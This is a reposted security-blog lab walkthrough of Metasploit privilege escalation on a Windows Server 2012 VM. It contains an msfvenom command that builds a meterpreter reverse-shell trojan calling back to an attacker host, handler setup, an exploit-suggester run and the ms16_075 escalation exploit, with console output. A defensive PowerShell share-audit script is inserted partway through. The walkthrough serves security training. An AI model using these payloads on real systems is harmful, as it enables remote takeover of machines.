Windows溢出提权 [msf全自动提权练习]

admin · 2024-10-13 18:17:42


Environment

Windows Server 2012 target (victim machine), Kali attacker machine, Windows 10 (used only as a relay for files; the first two are what matters)

Windows Server 2012

(Because this VM cannot install VMware Tools and therefore cannot exchange files with the physical host, I set up a shared folder on my Win10 host so that the machines can exchange files, which makes the later steps easier.

The normal flow would be that the 2012 box runs a web service; after getting a shell there, the trojan is uploaded and run so that it connects back to MSF.)


Generating the exe trojan on Kali

Windows msf.exe reverse-connect trojan; the callback address is the Kali address and the callback port is 4444

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.54 LPORT=4444 -f exe -o msf.exe

Then drag the trojan into the shared folder on the physical host

Uploading the trojan

Because the physical host and the target cannot exchange files directly, a different approach is used: the two machines are on the same subnet, so the host enables the file-sharing service and the trojan is copied to the target over the share.

Choose a folder to use as the shared folder


Right-click -> Properties -> Sharing -> select Everyone and add it


Grant Full Control

This is also to avoid running into other problems later on


Back in the Sharing tab -> Network and Sharing Center

This is to turn off password-protected sharing; otherwise it will ask for a username and password


Access the share from the target -> drag the trojan out

The path is long because I put the trojan in a subfolder of the shared folder (not a big deal); after that it can simply be dragged out
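The share configured above (Everyone with Full Control, password-protected sharing turned off) is exactly the kind of misconfiguration a defender wants to find before anyone else does. As an added example that is not part of the original post, this PowerShell audit lists non-administrative shares that grant Allow rights to broad principals and flags an enabled built-in Guest account, which is what turning off password-protected sharing does under the hood. It assumes a Windows 8 / Server 2012 or later host with the SmbShare module; the function names are my own.

```powershell
# Added example (not from the original post): audit the share misconfiguration
# the walkthrough creates (Everyone / Full Control, password-protected sharing
# off). Assumes Windows 8 / Server 2012 or later with the SmbShare module.

function Get-BroadlySharedFolder {
    param(
        # Principals that effectively mean "anyone who can reach the host"
        [string[]] $BroadPrincipals = @('Everyone', 'ANONYMOUS LOGON', 'Authenticated Users', 'Guests')
    )
    # Administrative shares (C$, ADMIN$, IPC$) are marked Special and are skipped here
    foreach ($share in (Get-SmbShare | Where-Object { -not $_.Special })) {
        foreach ($ace in (Get-SmbShareAccess -Name $share.Name)) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $principal = ($ace.AccountName -split '\\')[-1]   # drop the DOMAIN\ or BUILTIN\ prefix
            if ($BroadPrincipals -notcontains $principal) { continue }
            [pscustomobject]@{
                Share     = $share.Name
                Path      = $share.Path
                Principal = $ace.AccountName
                Right     = $ace.AccessRight          # Full, Change, Read or Custom
                Severity  = if ($ace.AccessRight -eq 'Full') { 'High' } else { 'Medium' }
            }
        }
    }
}

function Test-GuestAccountEnabled {
    # "Turn off password protected sharing" works by enabling the built-in
    # Guest account (RID 501), so an enabled Guest is the signal to look for.
    $guest = Get-CimInstance -ClassName Win32_UserAccount -Filter 'LocalAccount = TRUE' |
        Where-Object { $_.SID -like 'S-1-5-21-*-501' }
    return [bool]($guest -and -not $guest.Disabled)
}

$findings = @(Get-BroadlySharedFolder)
if ($findings.Count -gt 0) {
    $findings | Sort-Object Severity, Share | Format-Table -AutoSize
} else {
    Write-Host 'No non-administrative shares grant access to broad principals.'
}
if (Test-GuestAccountEnabled) {
    Write-Warning 'Built-in Guest account is enabled: shares can likely be reached without credentials.'
}
```

Run it from an elevated PowerShell on the sharing host; the folder set up in this walkthrough shows up as a High-severity finding together with the Guest warning.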


Listening on Kali

Enter: msfconsole

Select the handler module: use exploit/multi/handler

Set the payload: set payload windows/meterpreter/reverse_tcp

(This payload must be the same one used when generating the trojan)

Check what else needs to be set: options

Set the lhost address: set lhost 192.168.10.54

(The listening address, which is also the callback address set when the trojan was generated (the Kali box itself))

Set the port: it must match the trojan's callback port (here the default is already 4444, so nothing to change)

Start listening: run

Run the trojan on the target -> session appears in MSF

┌──(root㉿kali)-[/home/kali]
└─# msfconsole

       =[ metasploit v6.3.19-dev                          ]
+ -- --=[ 2318 exploits - 1215 auxiliary - 412 post       ]
+ -- --=[ 1234 payloads - 46 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Enable verbose logging with set VERBOSE true
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/met
set payload windows/meterpreter/bind_hidden_ipknock_tcp
set payload windows/meterpreter/bind_hidden_tcp
set payload windows/meterpreter/bind_ipv6_tcp
set payload windows/meterpreter/bind_ipv6_tcp_uuid
set payload windows/meterpreter/bind_named_pipe
set payload windows/meterpreter/bind_nonx_tcp
set payload windows/meterpreter/bind_tcp
set payload windows/meterpreter/bind_tcp_rc4
set payload windows/meterpreter/bind_tcp_uuid
set payload windows/meterpreter/reverse_hop_http
set payload windows/meterpreter/reverse_http
set payload windows/meterpreter/reverse_http_proxy_pstore
set payload windows/meterpreter/reverse_https
set payload windows/meterpreter/reverse_https_proxy
set payload windows/meterpreter/reverse_ipv6_tcp
set payload windows/meterpreter/reverse_named_pipe
set payload windows/meterpreter/reverse_nonx_tcp
set payload windows/meterpreter/reverse_ord_tcp
set payload windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp_allports
set payload windows/meterpreter/reverse_tcp_dns
set payload windows/meterpreter/reverse_tcp_rc4
set payload windows/meterpreter/reverse_tcp_rc4_dns
set payload windows/meterpreter/reverse_tcp_uuid
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set lhost 192.168.10.54
lhost => 192.168.10.54
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.10.54:4444
[*] Sending stage (175686 bytes) to 192.168.10.62
[*] Meterpreter session 1 opened (192.168.10.54:4444 -> 192.168.10.62:49196) at 2023-07-21 09:28:52 +0800

Here the trojan should have been uploaded and run through the webshell. But since the 2012 target has no web service, I just clicked and ran it on the target directly (this gives Administrator privileges; never mind that, our goal is to escalate to SYSTEM)


Check the current privileges

Put the session in the background

bg


Privilege escalation

Switch to the exploit-suggester module

use post/multi/recon/local_exploit_suggester

Check what needs to be set

options

Set the session

set session 1

Start it

run

Command transcript

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits


View the full module info with the info, or info -d command.

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

It then automatically checks which vulnerabilities may be exploitable and lists them when it finishes

"yes" means the vulnerability may be present and exploitable, "no" means it is not


Running the privilege escalation

Select a module: use exploit/windows/local/ms16_075_reflection_juicy

Check which settings are needed: options

Set the session: set session 1

Start it: run

Command transcript

msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ms16_075_reflection
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_075_reflection) > options

Module options (exploit/windows/local/ms16_075_reflection):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  none             yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.54    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


View the full module info with the info, or info -d command.

msf6 exploit(windows/local/ms16_075_reflection) > set session 1
session => 1
msf6 exploit(windows/local/ms16_075_reflection) > run

[*] Started reverse TCP handler on 192.168.10.54:4444
[*] x64
[-] Exploit aborted due to failure: bad-config: Session/Target Arch mismatch; WOW64 not supported
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/ms16_075_reflection) > use exploit/windows/local/ms16_075_reflection_juicy
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms16_075_reflection_juicy) > set session 1
session => 1
msf6 exploit(windows/local/ms16_075_reflection_juicy) > run

Privilege escalation succeeded


Originally published on the WeChat official account 小白摸坑学网安: Windows溢出提权 [msf全自动提权练习]

Reposted on CN-SEC中文网 (please keep this link when reposting): https://cn-sec.com/archives/2493033.html
